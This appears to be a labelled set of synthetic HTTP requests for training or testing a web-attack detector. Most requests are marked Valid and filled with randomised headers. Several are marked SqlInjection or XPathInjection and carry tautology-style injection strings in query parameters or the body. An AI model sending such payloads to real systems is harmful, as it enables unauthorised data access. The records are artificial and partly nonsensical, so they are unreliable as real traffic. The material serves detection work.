GET /3JRD1/h0XvA3EGAsj2NY-a/U2re26stmtoicnhfaa/3Bdrop7accept-bin2jslqG5/Ffrom-Hgocl/hora30wwld/cfneedeernCy.pl?VlhMexecT=o4j.5lUtz&seaa5aintteEgn=l1hk&Gpds=sm&etnartuap=e&isottoextle=aeI&s3sFesein=seg%25nLconnect1uDhhm&rsu=4412&Tposupg=hu&9grOrl79arn=T0winTltcnder&E7i=i3pof&nmGcao4ii=a++e&hsjtradeoees4=3ellets7Rruhhttps&IhM2Sj=oebnresbhmt&6p=0attm%3Et%3C%3ECeeetn&udfhthllNrilem=nziteiA3lq HTTP/1.1
Host: www.oee6nshfre.org:15
Connection: close
Accept: video/*;q=0.1
Accept-Charset: *
Accept-Encoding: compress;q=0.3, identity, gzip;q=0.1
Accept-Language: 9fic-f
Cache-Control: max-stale
Client-ip: 158.59.108.24
Cookie: xrmt==t0iaeh$riaht;iYPgrD8ihaat=Set;npeeruTfes=telmwtgjcpph;i7Ua4bf=wioptl
Cookie2: $Version="479"
Date: Thu, 24 Jun 04 06:44:20 CET
ETag: "QNU4RFiFOfhO0cpqGyy"
Expect: 100-continue
From: riig0g@lptIii.ch
If-Modified-Since: Sun, 08 Feb 04 21:09:01 GMT
If-Unmodified-Since: Sat, 04 Jun 05 11:55:45 CET
If-Match: "3zy79OMbSsI8f0w"
If-None-Match: *
If-Range: "q68rFWO1Omsd3fOLso"
Max-Forwards: 89
MIME-Version: 8.0
Pragma: ehcdrh=eorpTh
Proxy-Authorization: Basic YXNob2lvZTplSG1h
Authorization: NTLM cmdlbWJyZWhyb21hNFlhcmFnZ3RhVXNvYWlocmNucXFhZGhzdHNvYTlIZA==
Range: -93,1-996180
Referer: http://www.iEenluor.uk/cCcten/lTnnosa/jileft0T/hsra/eglauj.php3
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/7.7 (Machintosh; U; PPC Mac OS X 9.3; nn-ge; rv:0.6.9) Gecko/53971664
UA-CPU: x86
UA-Disp: 452,8652,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0744x394
Via: 9.9 www.tinves.png
Transfer-Encoding: identity
Upgrade: San/7.3, ca4nhm/3.6, ldv9e/4.7, tOe4/9.1
Warning: 233 131.132.144.191 "OnEdmsatmalecc2jI" "Sat, 10 Jun 06 22:22:26 UTC"
X-Forwarded-For: 185.28.190.254
X-Serial-Number: 0724313649410885
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 18376
Start - Id: 41803
class: SqlInjection
GET /iK8Ozr8E.23Qm@VSD5b/tjKdNLoYAaxVNoFHeEdh/iPCw_jNdE7@r4vAxwgJ/9w/uetrgR/etW-BuBn/AL6.7cJK2arrAo/fTs-2W2CWKGF/eaZyJQW/f@69fUSa29.jpeg?2z7inoll9h=6e5+%3F2hin+o6lR&iaoo=%27+%2F**%2F++++OR++%2F**%2F+%27nfn6oa1cr%27+%3E+++++%27S&peL3nulw=881&otv=47802638&iem5heIetp=%3F%29rc HTTP/1.1
Host: www.t4doaata.st
Connection: 1ee8aA
Accept: text/*, application/zip;q=0.4, text/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: 7oee4-urek5nl;q=0.0
Cache-Control: max-age=1
Client-ip: 175.74.180.28
Cookie: 4i1eta2cwMhtnfE=75;aewenN=tyahPjtebh;LBK6access_log=skd&epnp(rnk o;et=1;ieoo6Coopic9aI2=4snoEs3sis
Cookie2: $Version="6"
Date: Mon, 06 Feb 06 08:55:24 GMT
ETag: "goP@w.JGBMzQYwW2."
Expect: ytnux=thiRx
From: ame9p@neehptrbo.fr
If-Modified-Since: Wed, 10 Jan 07 11:04:30 GMT
If-Unmodified-Since: Thu, 19 Nov 09 01:50:50 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 4.3
Pragma: nner0e=nccidys
Proxy-Authorization: dgDa4v rdekp=aenneN
Authorization: Digest response="AfBa693E738c5312C3cc598A5b18d363"
Range: 6-,0-8
Referer: http://www.6din.be/xanaLy2/AjsO/dezrep.nsf
TE: gzip,trailers,deflate;q=0.4
Trailer: Max-Forwards
User-Agent: Mozilla/4.8 (Windows; U; Win 9x 4.7; rh-p9; rv:8.3.5) Gecko/59893001
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7848x368
Via: 4.7 0.69.197.174, 6.1 www.nmnt.jpeg
Transfer-Encoding: compress
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 378 www.eolmt.png "ab9c" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 34361564811
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41803
Start - Id: 18797
class: Valid
GET /t9cPzrmpE5SjFHwnEJU6/r2tN0t5tG/q3oSxGDae/hr/s1zIva/udg/xm_QHno@a@V@jBgFcm_/cmNyQI5Ll.dll?el=b2GCN4rsESN&gtLx62@PvmA=3982243&xu=rfc1QYEb&mdRrlnnstwmsumd=8551085890&8HfCw5c=hz5Q5&v6K2PSHGV=hp6tlaCa2enmf&obEolsede=Mmas&o8yqiv9ao=7985&Ubj0=ge2nph-niframe%3Eonjhmt%3E%7Cbetweenincludea&loaml=s9ylu1inqdjsenYnn&rl=7143&oainsmere5uue=aC_cvUs8Btk&zh=697&n3DoeiLsteH=nph-oj&e@K3Dqi=headeletenpfn HTTP/1.1
Host: 129.97.250.61
Connection: sfteoe
Accept: text/*;q=0.6, application/rtf;q=0.1, text/html;q=0.6
Accept-Charset: x-mac-ce, iso-8859-5;q=0.3, euc-cn;q=0.3
Accept-Encoding: deflate, compress;q=0.7, gzip;q=0.1
Accept-Language: *
Cache-Control: max-stale
Client-ip: 177.191.160.102
Cookie: nxsrrnae=tsno4rie;VZHoS=28444
Cookie2: $Version="72"
Date: Fri, 08 Jun 07 10:30:37 GMT
ETag: W/"3HCs5i7zVg3zw139a8"
Expect: ohdT
From: nn9rr@wiueoi.biz
If-Modified-Since: Thu, 25 Nov 04 01:28:52 GMT
If-Unmodified-Since: Wed, 30 Sep 09 12:28:03 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2635
MIME-Version: 8.1
Pragma: t='weet6'
Proxy-Authorization: tnendI BbsfCEj=gydc
Authorization: Digest algorithm=MD5-sess
Range: -26166
Referer: http://sotn.com/5lAhooNy/haedelni/OfIl/pt0daiso.asp
TE: deflate;q=0.6,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.9 (compatible; Konqueror/9.5; Linux i586; peiahn; i5tdnt)
UA-CPU: MIPS
UA-Disp: 983,4723,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 017x6703
Via: FTP/1.2 www.Ralh.js, 6.0 www.osglwt.tiff, 0.7 251.115.91.228
Transfer-Encoding: gzip
Upgrade: T21ri/2.9, nerlj/2.8, otr/7.9
Warning: 587 60.189.174.160 "eapBalire2l" "Mon, 19 Apr 04 02:48:51 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 57174297786
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18797
Start - Id: 23329
class: Valid
GET /drhlldpfnutegww/dR5vY/httpsS0replaceQJexec.php3?xsheketcl=r&ms9sEjooatoedac=Nieloe6iiGysurgllr&53bhefsN=q3Binmq&access_logEWlpla0h=%27ant&itehnouad1nc=a+edrop&aodha=pzdRussmhimi&eeitn=8&1ihDssh13rbU8f=pMR&adts=92061 HTTP/1.1
Host: 142.105.85.17:93475
Connection: ebialrs
Accept: audio/basic;q=0.8, application/rtf;q=0.3, text/html
Accept-Charset: *
Accept-Encoding: gzip, compress, compress;q=0.5, compress;q=0.3, identity
Accept-Language: wyizh-en, usbr7w-t9, rdn-Lgy, cetet-ea50de;q=0.7, mgiteeEt-a
Cache-Control: max-age=5437
Client-ip: 87.140.193.18
Cookie: ees=35;ahQAKJ=igetr;edib4=oar vxml0;6nerelha=n;nmailIHpMZ9V=a;45JPN5.OEd=i
Cookie2: $Version="186"
Date: Thu, 01 Mar 07 08:38:31 CET
ETag: W/"ynrqS@txFebq1J5v8"
Expect: 100-continue
From: 2lbei@tdeem.org
If-Modified-Since: Thu, 15 May 08 19:19:00 GMT
If-Unmodified-Since: Fri, 28 Oct 05 02:58:07 CET
If-Match: "qEXNYx.I8ONnfaF"
If-None-Match: "A_H.MUK.u75Ufz-0k"
If-Range: *
Max-Forwards: 5
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: Digest response="233d771dA1aa85c22883aEfAFc4Bb6E5"
Range: 56641-,-4,2-
Referer: http://i23ag.it/ecbifIug/edenipsf/eleh/mdqite.jpg
TE: chunked
Trailer: User-Agent
User-Agent: du9BqyPyA http://www.0uaj.de
UA-CPU: 68000
UA-Disp: 295,003,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 229x4077
Via: 0.1 68.222.62.88:4
Transfer-Encoding: identity
Upgrade: djbm1/8.1, yti/6.3, troL/1.6, aze4re/4.7
Warning: 614 www.eyqtEs.shtml "o4SsAiadTpu" "Mon, 26 Jul 04 10:18:10 GMT"
X-Forwarded-For: 18.106.251.115
X-Serial-Number: 22361064185048
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23329
Start - Id: 33559
class: Valid
POST /hgKlbody/59dchildG2/3QLXd/nYU_bWUOD/not.png? HTTP/1.1
Content-Length: 34
Content-Language: Brl,oqwhAdld
Content-Encoding: gzip
Content-Location: /eobsrrvi/aldeesl/ywCOe/shaea/HodlehT.asp
Content-MD5: Z3Jzb29qbG53bkV0cG5tdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Oct 09 21:55:19 GMT
Last-Modified: Wed, 30 Jul 08 01:50:46 GMT
Host: www.qheawenw7.de
Connection: keep-alive
Accept: text/xml;q=0.7, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: of-rie, laimrhs-pb;q=0.4
Cache-Control: no-store
Client-ip: 83.91.209.204
Cookie: rlh=aee8mejaaishclwz;nehg4=4055642;tr3sy=17873;st8tgisehdqi=8;lilsielwsdoeh=oUkQrU6Or_mr
Cookie2: $Version="835"
Date: Fri, 24 Jun 05 21:23:40 CET
ETag: W/"G4y63TaRjt6qV8P5.YwZ"
Expect: 100-continue
From: nndz@n7ls.fr
If-Modified-Since: Mon, 27 Feb 06 23:32:09 UTC
If-Unmodified-Since: Sat, 31 Jan 09 07:54:03 UTC
If-Match: "_yX-26cT-0X_@4EBLB"
If-None-Match: "kRLHWQ.e1I_Md.6"
If-Range: Tue, 19 May 09 02:24:45 CET
Max-Forwards: 436
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM aXJlbHBlNHRsazdsbGZpbmh0cmVpZXNzdXlnbGVrN2lpbjZuc2ZlMW90ZXJy
Authorization: Digest realm
Range: -842
Referer: /thtneQ/eclroseb.php4
TE: trailers,deflate
Trailer: Transfer-Encoding
User-Agent: ntdws806as (cwHp-TSoPA; bYDlHjTjT; aaEsQPGhv_; t_0GJ1BI)
UA-CPU: PowerPC
UA-Disp: 3018,583,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 417x756
Via: 2.8 www.ofBdnsls.shtml:8
Transfer-Encoding: compress
Upgrade: rgdr/2.7, pttC/2.5, tte/1.7, eqltXw/6.0, NuhE/6.5
Warning: 904 254.251.47.53 "9tyslbOtj" "Fri, 25 Nov 05 09:55:02 UTC"
X-Forwarded-For: 188.249.94.253
X-Serial-Number: 2914047
----: -----------------
~~~~~: ~~~~~~~~~~~

fimc= (&ier8e18rre=jya 'Silr4o

End - Id: 33559
Start - Id: 35157
class: SqlInjection
PUT /fi/RMQfUyArc/e0cHEgrTT/9ietcyeeksfiernidhaz/iaFrtissTplzqe/I-ziinputVmb0Elk/xNzKT4O.kPZJ.ezz.html? HTTP/1.0
Content-Length: 260
Content-Language: utai
Content-Encoding: gzip
Content-Location: http://www.a3l8.de/tztu/Ue8tieij.cfm
Content-MD5: RGFvb2JGaWdsYnB5dWVEYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jan 04 24:22:54 GMT
Last-Modified: Sun, 12 Jun 05 23:53:54 CET
Host: www.watsterun.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip, compress;q=0.4, compress;q=0.3
Accept-Language: bd8en-Luqse
Cache-Control: max-age=2465
Client-ip: 230.250.218.171
Cookie: BUN8wJ=jform(gT?t;zmhloralelEele=iframemcatWSusua;eeue2iR1una=o1X8fQOJ7g;hoaekc4=shutdown2$eqtKl/ xr;st;bersqournicdtw=59961292
Cookie2: $Version="16"
Date: Thu, 25 Sep 08 13:39:12 CET
ETag: "MNa@-a68w9FVcPZY"
Expect: eel5Noee
From: obasole@fadfesnt.cz
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Fri, 15 Feb 08 17:07:10 CET
If-Match: *
If-None-Match: "R8d@tNBf6SyOsDkYFz"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: NTLM cG5vZWhldjNpclR3aWZndWUzc2Vsb3RzZXFqZWZEODBlbmJqcm90d2VhbQ==
Range: 19-,8448-508426,664-75850
Referer: http://www.oy7eg.it/nrnw/ribNzl.sh
TE: deflate
Trailer: Host
User-Agent: Mozilla/9.7 (Windows; U; Win98 3.8; mf-jS; rv:8.9.3) Gecko/18372650
UA-CPU: StrongARM
UA-Disp: 2481,6599,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: hr1/3.1 www.o4s3em5e.jpeg:93456, 1.3 www.zmUtAft.html, 7.2 www.iLb7rPNa.jpeg:15025
Transfer-Encoding: deflate
Upgrade: ispEo/3.6, Yt33t/0.8, dlleet/6.1
Warning: 616 www.siai.png "ttlplonce" 
X-Forwarded-For: 126.226.47.150
X-Serial-Number: 1589979747
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

w65tr=f;8ll&aIejqlqxej=8943&aeldcatS=OR  'ew'     =     N'     '&yee4meert=usegt&kbn7ra8aled2iar=8892&eMmneopiaqrnui=kftatusr&screadgidjei=ina&EtelDdhtte=Oel&noeto=([~&etc2zL=adorSe:hr7autoexecs3n8&yp.q11qhalink=hoa]e/eanrupdate5&ToOd

End - Id: 35157
Start - Id: 20030
class: Valid
GET /_xGBftmpYeL/lwG_cMDlu3xMXr2NA4d9/cLD0im_-kIUG/lBT@nFPtvD2.AVOJpYv/piTnaijnde/5y17jt3Zvv/1k6T_PX7ifG1Cd/7h/Ztnmlcrzaiswtoxeieat/enjqKKM.7j6bU.html? HTTP/1.0
Host: 0.104.94.203:80
Connection: keep-alive
Accept: image/png;q=0.3, audio/*;q=0.2, audio/x-wav
Accept-Charset: windows-1251;q=0.3, x-mac-turkish;q=0.6, euc-tw;q=0.1, isiri-3342
Accept-Encoding: gzip, deflate, identity, deflate, gzip
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 30.88.191.125
Cookie: YRAeT=5htinsertphn4rn;1nhtacces4hvIQIH=507;yhyj=mdprocessing-instructionria8
Cookie2: $Version="5"
Date: Tue, 25 Jan 05 22:09:40 UTC
ETag: "F.jc5.0drZimdkz"
Expect: 100-continue
From: fiyrdNy@miRwaddr.cz
If-Modified-Since: Thu, 04 Oct 07 17:43:35 CET
If-Unmodified-Since: Thu, 05 Mar 09 08:00:12 CET
If-Match: *
If-None-Match: *
If-Range: "x7vBihiGHe6@ELgRk-08"
Max-Forwards: 3361
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic ZWRlbDphbjJuZWVlaQ==
Authorization: Basic U3RuRnBvb3U6N29uYXRk
Range: -9850,-091367
Referer: /4oSsb/ycsxvTe/4ierl/httyand/TIaayxl.cfm
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: eAOtZ1X9 http://www.athilet.be
UA-CPU: PowerPC
UA-Disp: 6419,466,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6883x9445
Via: HTTP/5.7 www.bcemzt.css, FTP/7.5 45.0.47.250
Transfer-Encoding: compress
Upgrade: bdhepu/8.1, Vgioj/9.0, cn4dd/3.3, obt/7.0
Warning: 933 www.eoio.png:16177 "hIirthSs" "Tue, 06 Feb 07 23:19:23 CET"
X-Forwarded-For: 99.9.48.167
X-Serial-Number: 185531423
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20030
Start - Id: 13331
class: Valid
GET /p4VmGAIJY6w.body.php3?oamb8=8P%40AwIX2V6&ehwyiycdiqepep=oGl&Ieebddbcrh=30A&Mamske=7100952&D4c@k-kyQJ=75214452&eenhoe2autza=nE2DEX&ln=515074&ttko=nt%3Dls&access_logtN_oWmSp=5998&ttltj0rr3rcat=19707656&sa9miza=204 HTTP/1.0
Host: 158.103.88.191
Connection: vlVeOnIn
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress, gzip;q=0.5, compress, gzip
Accept-Language: *;q=0.3
Cache-Control: min-fresh=648
Client-ip: 49.183.209.209
Cookie: 9unHpzFM4=29;YkExPaD=eiYaeto;sqohemaU=2300
Cookie2: $Version="974"
Date: Thu, 02 Aug 07 24:55:53 GMT
ETag: W/"pK5DcAyL1xkVaZ-c"
Expect: 100-continue
From: vis1fi@seiyZ1s.uk
If-Modified-Since: Thu, 09 Feb 06 18:39:15 UTC
If-Unmodified-Since: Fri, 01 Jun 07 22:43:59 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 26 Oct 08 01:16:45 GMT
Max-Forwards: 3
MIME-Version: 5.1
Pragma: sa7ecsep=erane
Proxy-Authorization: NTLM dG5vWXU2bzVvMm5hdGFoYjFvTGF6aXJhZ3NuYW5VZW9wdGU3
Authorization: NTLM YWFvYWl0ZHJleXNuVEg3bHNVMHNlZWRueGFlRWVSbkJsZmlhb29jZWlpdVM=
Range: 30510-65,097-,-5721
Referer: /hoh7dwug/ie4aTh.tiff
TE: trailers,chunked,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: tytdilhc4i/3.2.5
UA-CPU: x86
UA-Disp: 537,5554,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 643x366
Via: 2.3 137.246.219.77:7663, HTTP/9.0 www.DhFsieh.html
Transfer-Encoding: deflate
Upgrade: arbqe/0.4, stO/8.7, nMx/4.4, ioMi4D/1.1, oChir/3.9
Warning: 546 55.226.25.251 "gesRteed" "Sat, 17 Feb 07 08:12:13 UTC"
X-Forwarded-For: 86.238.108.143
X-Serial-Number: 52905795752439402910
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13331
Start - Id: 21056
class: Valid
GET /r8n67uNaD4OG9Fs3.html?kdef=+etce&hpaNjr6mepdhpom=dTnulleux&GvWqv=eq7sornel6i&osroegh=9657464576&ys=wyh26ynQgGl&hiei5tdeem=0Di&hT6srg=028998 HTTP/1.1
Host: www.poxhhcar.org
Connection: keep-alive
Accept: audio/*;q=0.4
Accept-Charset: iso-8859-6;q=0.5, ks_c_5601-1987, x-mac-arabic, euc-tw
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 226.117.147.113
Cookie: Metdia9fdatz=4;zCaE=irn7l;3a9qthnn=rdNeoor udelete-hzo;sepbm=6895514422;cPh=ir8hza
Cookie2: $Version="462"
Date: Fri, 20 Jun 08 17:47:58 CET
ETag: "Qs6u8k3HRelHZUefCZ"
Expect: 100-continue
From: uo8i@oteEttyH7e.gov
If-Modified-Since: Tue, 29 May 07 13:49:46 UTC
If-Unmodified-Since: Sat, 24 Sep 05 11:41:52 UTC
If-Match: "JHMAJmx_8EQ6lY9yNq"
If-None-Match: "rbNCvsv90zI1H8vVOyu"
If-Range: *
Max-Forwards: 4
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: NTLM eWVlUmZhYXFsdXRvMjhPY2VnVGUzZ2FoaUFlc2VvRWVp
Range: 249654-
Referer: /rehsHEF7/sht2nsg.pl
TE: deflate
Trailer: If-Modified-Since
User-Agent: SdtUryitieicnxn
UA-CPU: 68000
UA-Disp: 2624,2413,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 523x776
Via: HTTP/2.7 90.63.195.184:58189, CmiHti/3.1 253.219.127.50
Transfer-Encoding: compress
Upgrade: 7ynff/7.0
Warning: 708 255.125.121.38 "eth4asnh" "Sun, 05 Aug 07 12:56:58 UTC"
X-Forwarded-For: 204.19.242.253
X-Serial-Number: 650978480578430420
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21056
Start - Id: 25432
class: Valid
GET /vheTebprteh/a8_SAW7mANAJ4.6-6sup.png? HTTP/1.1
Host: www.uetl.fr
Connection: lOnWlaeu
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.7
Accept-Language: *;q=0.5
Cache-Control: p=sqhuS
Client-ip: 82.74.210.10
Cookie: taA2yn=elali1eugmi;KncmetaIqnei18G=43519;3sHE=05882;KWYyyaccepto=866270494;hlsmF5opendZ8rcpu=e aKwe;eiT=3333042
Cookie2: $Version="634"
Date: Mon, 24 Jul 06 20:39:36 CET
ETag: W/"3mRfOB8JKF_XbSkIwX70"
Expect: keo3Em
From: ledpneia@lcpqUt.de
If-Modified-Since: Thu, 30 Apr 09 05:04:14 CET
If-Unmodified-Since: Sat, 12 May 07 07:50:37 GMT
If-Match: "jiShs_gZ8WWZBjv9"
If-None-Match: "LsneYT@bIL57mlzobK"
If-Range: Wed, 18 Jul 07 03:57:13 GMT
Max-Forwards: 22
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM UmVsb2ZyemNJd2VncmFhd2k1QTVPc2hiY25ycmVzS2h1YWFTdGVlbWlr
Authorization: Digest nc=4EcE6BCE
Range: 792212-0
Referer: /aiapc1/in7od/gomthd/gol8so/reAusm.pl
TE: trailers,deflate;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: treA5ahtadPleoynisgx
UA-CPU: x86
UA-Disp: 4448,2047,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 407x092
Via: 0.3 55.170.187.141, 2.8 www.9xMou3ar.htm
Transfer-Encoding: deflate
Upgrade: roti/6.6, neeqsd/9.8, ycfke/5.8, l52ps/7.9, Ahg/7.6
Warning: 257 2.176.158.197 "ifnht" 
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 588564161052
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25432
Start - Id: 49828
class: XPathInjection
GET /aRehh94Slm3tbrtitn/r0mAqdio/q9nngFviantye/e2aye/dDR4a/irvunygiy9/nuUUvm/aeqhYp6r7fdqt/ishiReH6/RdTe.shtml?qifxk=708965&1FWnjjEP@c=9325060&lmeduefaptweNQ=ti1%27++or++6++++%3C+count%28path%2Fchild%3A%3A*%29+++or+%27ahzateo%27++++%3D++++%27&Reasttanm=6&Anoe7pn4saheis=amjfn&dk=69&5fdsn0l=266566&BmailimgrC6m=53905&a7rtblrimezek4t=osoe&itne=jxmlreP%24wgetu0attnai&tsVhsud=yehedsa0denefen&eMftifuy@tmp-q=82&sWimgZ_o=laaU01MZO9WK HTTP/1.0
Host: 246.116.247.65
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.7, x-mac-korean;q=0.3, utf-8, shift_jis;q=0.6, iso-10646-ucs-2;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=89852
Client-ip: 77.69.248.51
Cookie: 0sibelidrr=A8;3sittzGIYVx=ossen;btleRisinclibg=32
Cookie2: $Version="7"
Date: Sun, 12 Nov 06 22:52:25 GMT
ETag: W/"w.9GIbIX8mlsodZh"
Expect: 100-continue
From: noamdhg@Dea3h8.biz
If-Modified-Since: Fri, 11 Jan 08 24:40:59 CET
If-Unmodified-Since: Sat, 23 Oct 04 10:59:50 CET
If-Match: "@VYXx_B.ty2TE6KS"
If-None-Match: "oaGOmk42r0VfPgn5P9kZ"
If-Range: "Tk_7pMYt2ZAAxSR"
Max-Forwards: 7
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: NTLM bmxtRnJlNDVobWl1d2lsbzVuZWxrQzR0d3VqNm56dWRpb2Rv
Range: -29302
Referer: /aetcifcn/t5oruMir/lnleA.pl
TE: chunked,trailers
Trailer: If-Range
User-Agent: oR8SeO http://www.netet.com
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 172x6984
Via: HTTP/7.4 131.11.242.180:49, 5.3 208.90.163.134, 5.4 www.losshehe.css
Transfer-Encoding: coalqt; lpietfo=dipdwS
Upgrade: oega/2.1, oaa/9.5, pharkT/6.9, nba/7.2, nha/2.3
Warning: 539 163.222.151.131 "oqahsnbhdol" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49828
Start - Id: 11393
class: Valid
GET /ir4tarIrfssraTasa/cy5bs4Ac6ykv0G.ov/seeOi5.shtml?ptiD=t&evalFa3zallYcrpxt=3&rooofirao6t=isa+y&fkesn=20sArtriatleeuo&5aa3ha8=H4tsftteM2c HTTP/1.1
Host: 39.13.71.153
Connection: close
Accept: */*;q=0.4
Accept-Charset: windows-1253, x-mac-ce, euc-kr;q=0.7, iso-8859-8;q=0.5, shift_jis;q=0.0
Accept-Encoding: 
Accept-Language: pevcsEz-neshah1b;q=0.0, mei0wrsa-timha;q=0.3, m-8yk;q=0.9
Cache-Control: only-if-cached
Client-ip: 210.70.209.242
Cookie: 9ac5o3Y=eiK3QqwZow;1otree=8adQAq
Cookie2: $Version="2"
Date: Mon, 21 Nov 05 12:56:09 UTC
ETag: "RZ2m-ikEP5r@5ZO4xnn"
Expect: diCxno
From: snso@neess.uk
If-Modified-Since: Tue, 21 Feb 06 02:07:34 GMT
If-Unmodified-Since: Thu, 14 Jun 07 01:31:27 UTC
If-Match: *
If-None-Match: *
If-Range: "lrJ0rML9vcSwh.QErLH"
Max-Forwards: 649
MIME-Version: 4.6
Pragma: ncvanUe='ie'
Proxy-Authorization: NTLM dHN0TGN4NmVua2VzZGh4d3luZnJjM01TZnc4Tk51VGV6WmpubGVz
Authorization: NTLM MG9hRXd5ZWx4b1NDa1EwaGlpZWVsbm13T05manNnbmVlbml2ejNraHpseHNybmc=
Range: 53554-,0954-67,-51599
Referer: http://www.xwmiateR.be/ytOnr/eni3ctw9/ovuq.css
TE: trailers
Trailer: Accept-Language
User-Agent: 79oLseoewt
UA-CPU: Sparc
UA-Disp: 299,1774,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 988x4080
Via: 9.9 www.no2tk.css, 8.1 50.118.156.98:9147
Transfer-Encoding: identity
Upgrade: FyyeaN/5.3, G42/8.9, esemRu/3.3, eet/5.0
Warning: 549 54.14.146.24 "veiinschlftang5nhhmr" 
X-Forwarded-For: 194.171.248.197
X-Serial-Number: 99503371855760774661
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11393
Start - Id: 26147
class: Valid
GET /8NL5r7i7mYeJ6xybXvZ./iFejrTkoQ/hEqih/aehDNinu6456ieosgeay/tonteihtisnNudsa/nnAiaae1oee0OtOohsTk/6R.exe?Esa=8qqUis&doeo4rataD8f=eyewp-te+nrckE&Hp=akVRjdet&on0fw=kedlr%3E&MZo0aiHpS=rwue&unyahrIgNssnn=dylrauena6sh&sZNrQC3=oformI&f.mNp=7040867&lIrth=sprocessing-instructionata3e HTTP/1.1
Host: www.nixs.com:80
Connection: iowuot
Accept: */*
Accept-Charset: iso-8859-4, isiri-3342;q=0.6, x-mac-roman, x-mac-icelandic;q=0.3, shift_jis;q=0.1
Accept-Encoding: *
Accept-Language: vBii0Auf-ao;q=0.9, haRo8twt-aioe, omoo-te, av-h6ri7i
Cache-Control: no-store
Client-ip: 239.116.234.200
Cookie: tTrjet=ccMca;eShnull=d&t qbgrebnsals;fiyqwdropxt=r2k;hednhlel5Eoo=8;stlmh=16627941
Cookie2: $Version="957"
Date: Tue, 20 Nov 07 03:18:28 CET
ETag: W/"APhYenWjVHyPtzW"
Expect: iydni
From: hrNoh@eerlbd.be
If-Modified-Since: Tue, 31 Mar 09 13:19:23 CET
If-Unmodified-Since: Fri, 19 Jun 09 05:13:48 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 13 Jun 04 14:49:45 GMT
Max-Forwards: 6
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: eMdoo Wn3r8=eoab9tE3
Authorization: Digest cnonce="rwni2eo"
Range: 4-,78725-,-95
Referer: http://www.lOweovuy.org/bhnrexr/ttiti.wav
TE: chunked;q=0.9
Trailer: Warning
User-Agent: sa5tgdk9e0
UA-CPU: Sparc
UA-Disp: 8220,770,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7580x3767
